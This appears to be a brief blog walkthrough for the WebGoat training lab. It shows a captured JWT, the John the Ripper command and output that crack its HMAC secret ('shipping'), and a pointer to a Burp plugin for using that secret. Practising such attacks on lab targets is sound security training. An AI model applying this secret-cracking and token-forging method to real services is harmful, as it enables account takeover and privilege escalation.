cat > webgoat-jwt.txt eyJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJXZWJHb2F0IFRva2VuIEJ1aWxkZXIiLCJhdWQiOiJ3ZWJnb2F0Lm9yZyIsImlhdCI6MTU3NDI3MDQ4MywiZXhwIjoxNTc0MjcwNTQzLCJzdWIiOiJ0b21Ad2ViZ29hdC5vcmciLCJ1c2VybmFtZSI6IlRvbSIsIkVtYWlsIjoidG9tQHdlYmdvYXQub3JnIiwiUm9sZSI6WyJNYW5hZ2VyIiwiUHJvamVjdCBBZG1pbmlzdHJhdG9yIl19.zHaIM_ARkDQfNV4jwOYYorKFbcesj6WjgoVj-Z-0XiM
Run with JTR:
$ ./john webgoat-jwt.txt Using default input encoding: UTF-8 Loaded 1 password hash (HMAC-SHA256 [password is key, SHA256 256/256 AVX2 8x]) Proceeding with single, rules:Single Press 'q' or Ctrl-C to abort, almost any other key for status Almost done: Processing the remaining buffered candidate passwords, if any. Proceeding with wordlist:./password.lst shipping (?) 1g 0:00:00:00 DONE 2/3 (2019-11-20 10:56) 16.66g/s 2517Kp/s 2517Kc/s 2517KC/s christophing..Bluebirded Use the "--show" option to display all of the cracked passwords reliably Session completed
To use, just echo the password ("shipping" in this case) into webgoat-jwt-cracked.txt and import that as the "secret" file to the JSON Web Tokens Burp plugin:
https://github.com/portswigger/json-web-tokens
No comments:
Post a Comment